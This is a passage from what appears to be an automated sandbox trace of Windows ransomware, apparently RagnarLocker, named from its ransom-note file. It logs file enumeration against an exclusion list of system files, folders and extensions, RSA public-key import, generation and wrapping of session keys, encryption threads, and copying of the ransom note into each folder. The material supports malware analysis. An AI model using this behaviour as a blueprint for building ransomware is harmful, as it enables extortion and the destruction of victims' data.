lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0176.314] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0176.315] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0176.315] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0176.315] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0176.315] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0176.315] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0176.315] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0176.315] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0176.315] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0176.315] GetProcessHeap () returned 0x3520000 [0176.315] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0176.316] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" [0176.316] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0176.316] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1053\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.316] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0176.317] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned=".dll" [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0176.317] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0176.317] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0176.317] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0176.317] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0176.317] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0176.317] GetProcessHeap () returned 0x3520000 [0176.317] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586900 [0176.317] CryptAcquireContextW (in: phProv=0x3586900, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586900*=0x5d26c08) returned 1 [0176.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0176.318] GetProcessHeap () returned 0x3520000 [0176.318] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358ee28 [0176.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358ee28, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0176.318] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0176.318] GetProcessHeap () returned 0x3520000 [0176.318] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0176.319] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0176.319] GetProcessHeap () returned 0x3520000 [0176.319] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358ee28 | out: hHeap=0x3520000) returned 1 [0176.319] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0176.319] CryptImportPublicKeyInfo (in: hCryptProv=0x5d26c08, dwCertEncodingType=0x1, pInfo=0x35c9eb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x35c9ee8*, PublicKey.cbData=0x10e, PublicKey.pbData=0x35c9ef0*, PublicKey.cUnusedBits=0x0), phKey=0x3586904 | out: phKey=0x3586904*=0x3547cc0) returned 1 [0176.319] GetProcessHeap () returned 0x3520000 [0176.319] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0176.319] LocalFree (hMem=0x35c9eb8) returned 0x0 [0176.319] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d26c90) returned 1 [0176.319] CryptGenRandom (in: hProv=0x5d26c90, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0176.320] CryptReleaseContext (hProv=0x5d26c90, dwFlags=0x0) returned 1 [0176.320] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0176.324] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26520) returned 1 [0176.324] CryptGenRandom (in: hProv=0x5d26520, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0176.324] CryptReleaseContext (hProv=0x5d26520, dwFlags=0x0) returned 1 [0176.324] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0176.352] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26fc0) returned 1 [0176.353] CryptGenRandom (in: hProv=0x5d26fc0, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0176.353] CryptReleaseContext (hProv=0x5d26fc0, dwFlags=0x0) returned 1 [0176.353] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0176.356] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26300) returned 1 [0176.356] CryptGenRandom (in: hProv=0x5d26300, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0176.356] CryptReleaseContext (hProv=0x5d26300, dwFlags=0x0) returned 1 [0176.356] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0176.359] CryptEncrypt (in: hKey=0x3547cc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.360] GetLastError () returned 0x80090016 [0176.360] CryptEncrypt (in: hKey=0x3547cc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.360] GetLastError () returned 0x80090016 [0176.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x1274) returned 0x3b4 [0176.361] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d26da0) returned 1 [0176.365] CryptGenRandom (in: hProv=0x5d26da0, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0176.365] CryptReleaseContext (hProv=0x5d26da0, dwFlags=0x0) returned 1 [0176.365] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0176.367] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26da0) returned 1 [0176.368] CryptGenRandom (in: hProv=0x5d26da0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0176.368] CryptReleaseContext (hProv=0x5d26da0, dwFlags=0x0) returned 1 [0176.368] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0176.371] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26c90) returned 1 [0176.371] CryptGenRandom (in: hProv=0x5d26c90, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0176.371] CryptReleaseContext (hProv=0x5d26c90, dwFlags=0x0) returned 1 [0176.371] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0176.374] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26c90) returned 1 [0176.374] CryptGenRandom (in: hProv=0x5d26c90, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0176.374] CryptReleaseContext (hProv=0x5d26c90, dwFlags=0x0) returned 1 [0176.374] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0176.377] CryptEncrypt (in: hKey=0x3547cc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.379] GetLastError () returned 0x80090016 [0176.379] CryptEncrypt (in: hKey=0x3547cc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.380] GetLastError () returned 0x80090016 [0176.380] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x1278) returned 0x3f0 [0176.381] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0176.540] GetProcessHeap () returned 0x3520000 [0176.540] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586900 | out: hHeap=0x3520000) returned 1 [0176.540] CloseHandle (hObject=0x3b4) returned 1 [0176.540] GetProcessHeap () returned 0x3520000 [0176.540] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0176.611] CloseHandle (hObject=0x3f0) returned 1 [0176.611] GetProcessHeap () returned 0x3520000 [0176.611] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0176.611] FindClose (in: hFindFile=0x3547fc0 | out: hFindFile=0x3547fc0) returned 1 [0176.614] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1055", cAlternateFileName="")) returned 1 [0176.614] lstrcmpiW (lpString1="1055", lpString2=".") returned 1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="..") returned 1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="Windows") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="Windows.old") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="Tor browser") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="Internet Explorer") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="Google") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="Opera") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="Opera Software") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="Mozilla") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="Mozilla Firefox") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="$Recycle.Bin") returned 1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="ProgramData") returned -1 [0176.614] lstrcmpiW (lpString1="1055", lpString2="All Users") returned -1 [0176.615] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0176.615] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1055" | out: lpString1="1055") returned="1055" [0176.615] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\" [0176.615] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1055\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\" [0176.615] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\!$R4GN4R_B8CF767A$!.txt" [0176.615] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1055\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0176.620] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*" [0176.620] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.620] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0176.620] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0176.620] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547ac0 [0176.621] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0176.621] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf69ca2b0, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.622] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0176.622] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0176.622] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf69ca2b0, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf69ca2b0, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0176.622] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0176.622] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0176.622] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0176.622] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0176.622] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0176.622] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0176.623] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0176.623] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0176.623] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0176.623] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0176.623] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0176.623] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0176.623] FindClose (in: hFindFile=0x3547ac0 | out: hFindFile=0x3547ac0) returned 1 [0176.624] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547ac0 [0176.624] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf69ca2b0, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf69ca2b0, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.625] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf69ca2b0, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf69ca2b0, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0176.625] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | 